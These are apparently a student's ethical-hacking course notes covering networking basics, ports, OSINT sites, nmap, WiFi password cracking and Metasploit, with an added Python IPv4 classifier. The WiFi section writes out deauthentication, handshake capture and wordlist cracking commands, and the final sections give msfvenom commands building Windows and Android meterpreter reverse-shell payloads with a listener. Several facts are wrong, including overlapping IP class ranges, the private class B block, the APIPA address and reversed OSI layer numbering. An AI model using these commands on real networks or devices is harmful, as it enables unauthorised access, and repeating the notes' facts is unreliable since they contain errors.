
#Networking (1/Aug)...

It is defined as a connection between 2 or more devices which is used to share data.

Types: LAN, WLAN, CAN, MAN, WAN, PAN.

IP: It is a unique ID of our device or host.

Types: IPv4 and IPv6

IPv4--
1981.
32-bit IP
4.3 million addresses
Numeric, decimal notation (192.168.1.1)
Range 0-255.

IPv6--
1998
128-bit IP
7.3*10 raised to 28 IP addresses
Alphanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888)
Range 0-9 and A-F.

Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Government registered IPs)
E:240-255 (used for Experiments)

Special IPs:
127.0.0.1 --Loopback or LocalHost IP
169.0.0.1 --APIPA (Automatic Pvt IP Addresses)
255.0.0.1 --Broadcasting IPs

Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1
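
Added example (not part of the original notes): Python code that parses a dotted-decimal IPv4 address into its 32-bit value, derives the classful class from the first octet, and labels loopback, link-local (APIPA), broadcast, multicast and private addresses. It uses the standard ranges from Python's ipaddress module and RFC 1918; the name classify_ipv4 and the sample addresses are assumptions of this example.

```python
import ipaddress

# RFC 1918 private blocks (standard values).
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BROADCAST = ipaddress.IPv4Address("255.255.255.255")


def classify_ipv4(text):
    """Describe a dotted-decimal IPv4 address (hypothetical helper)."""
    # IPv4Address rejects anything that is not four octets in 0-255.
    addr = ipaddress.IPv4Address(text)
    first = int(addr) >> 24          # top 8 bits of the 32-bit value
    # Classful rule: the class follows from the first octet's leading bits.
    if first < 128:
        cls = "A"
    elif first < 192:
        cls = "B"
    elif first < 224:
        cls = "C"
    elif first < 240:
        cls = "D"
    else:
        cls = "E"
    if addr.is_loopback:             # 127.0.0.0/8
        kind = "loopback"
    elif addr.is_link_local:         # 169.254.0.0/16, used by APIPA
        kind = "link-local"
    elif addr == BROADCAST:
        kind = "broadcast"
    elif addr.is_multicast:          # 224.0.0.0/4
        kind = "multicast"
    elif any(addr in net for net in RFC1918):
        kind = "private"
    else:
        kind = "other"               # everything else, mostly routable space
    return {"int": int(addr), "class": cls, "kind": kind}


if __name__ == "__main__":
    # Constructed sample addresses.
    for sample in ("192.168.1.1", "127.0.0.1", "169.254.10.20", "8.8.8.8"):
        print(sample, classify_ipv4(sample))
```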

----------------------------------------------------------------------------------

#Ports (2/Aug)

Total Ports: 65535 ports


Registered Ports: 1024

Port State:
Open
Closed
Filtered (Specific)

Basic Ports
20-21: FTP File Transfer Protocol
22: SSH Secure Shell (Requires authentication)
23: Telnet Teletype Network
25: SMTP Simple Mail Transfer Pro
53: DNS Domain Name System (Used to link Domain and Domain Name to IPs)
67,68: DHCP Dynamic Host Config Pro (Provides IPs to newly connected devices)
80: HTTP To host website (Plain Text)
110: POP3 Post Office Protocol
123: NTP N/W Transfer Pro
135-139: NetBios Name Service
143: IMAP4 Internet Msg Access Pro
161-162: SNMP Simple N/W Management Pro
389: LDAP Lightweight Dir Authentication Pro
443: HTTPS (Secured) {Uses SSL Secure Socket Layer and TLS Transport Layer Secure to encrypt data.}
445: Microsoft-DS (Active Directory) / SMB (System Management Block)
2049: NFS N/W File Sys
3389: RDP Remote Desktop Pro
5900: VNC Virtual N/W Controller
4444 & 8080: Dynamic Port

----------------------------------------------------------------------------------

#TCP

TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent

#OSI Open Sys InterConnection (7layers)

1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical

----------------------------------------------------------------------------------

#Info Gathering

**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.Virus Total
5.WhoIs
6.Urlscan.io
7.Shodan (Info About Present Devices)

**Extensions**
1.Wappalyzer
2.FlagFox
3.W3Techs

**IP Info**
Grabify
IP2Location
Google Maps

OSINT Framework

----------------------------------------------------------------------------------

#N/W Scanning

Script Loc: /usr/share/nmap/scripts

Nmap Full N/W scan


nmap -Pn -sV -O IP

----------------------------------------------------------------------------------

#Enumeration

Def:
The process of extracting user names, machine names, N/W resources, shares and services from a system.

----------------------------------------------------------------------------------

#WIFI Hacking

WAP: Wireless access pro

Tools:
aircrack-ng
aireplay-ng
airodump-ng

Types of password cracking


1.Prediction
2.Dictionary (Wordlist)
3.Hash Method

Wordlist:
cd /usr/share/wordlists/

#to unzip the .gz file -- use gunzip (Filename)

Commands:

$ifconfig

$airodump-ng wlan0

$airodump-ng -c1 --bssid (MAC Add) -w Ethas (Filename) wlan0 ------ Handshake

$aireplay-ng -deauth 05 -a (MAC Add) wlan0 -------To Disconnect

$aircrack-ng Ethas-01.cap (Filename) ------To check Handshake

$aircrack-ng -w rockyou.txt (Wordlist) Ethas-01.cap ---To check the password.

#Hashed Method: (USE JOHN2 tool)

$aircrack-ng .cap (cap file) -j newfilename

$hccap2john newfilename.hccap > New.txt

----------------------------------------------------------------------------------
#Vulnerability Assessment

3 Terms:
CVE: Common Vulnerability Exposure
CVSS: Common Vulnerability Scoring System
CWE: Common Weakness Assessment

Tools Used:
Nessus Tenable (to find vulnerability and CVSS)

Websites :
CVE details
Rapid7
ExploitDB

----------------------------------------------------------------------------------
#Metasploit Framework

7 Module Of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9

Steps To use MF

$msfconsole (use to start MF)


$show (it is used to show exploits, payloads, aux, post, etc.)
$search (to search CVSS)
$use (it is used to set up an exploit)
$set (to set exploit, payload, etc.)

Steps to check and set requirements

$options (to view req)
$set RHOSTS
$set LHOST

To use or run

$exploit (this cmd is used)


$info (info about exploit)

----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM

1.Windows 10

Create venom at this location:- cd /var/www/html/

steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) PORT=4444 -f exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp

To check sessions
$sessions
$sessions -i (session no)

**************************************************
2.Android

Create a venom

steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) PORT=8080 -o Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp
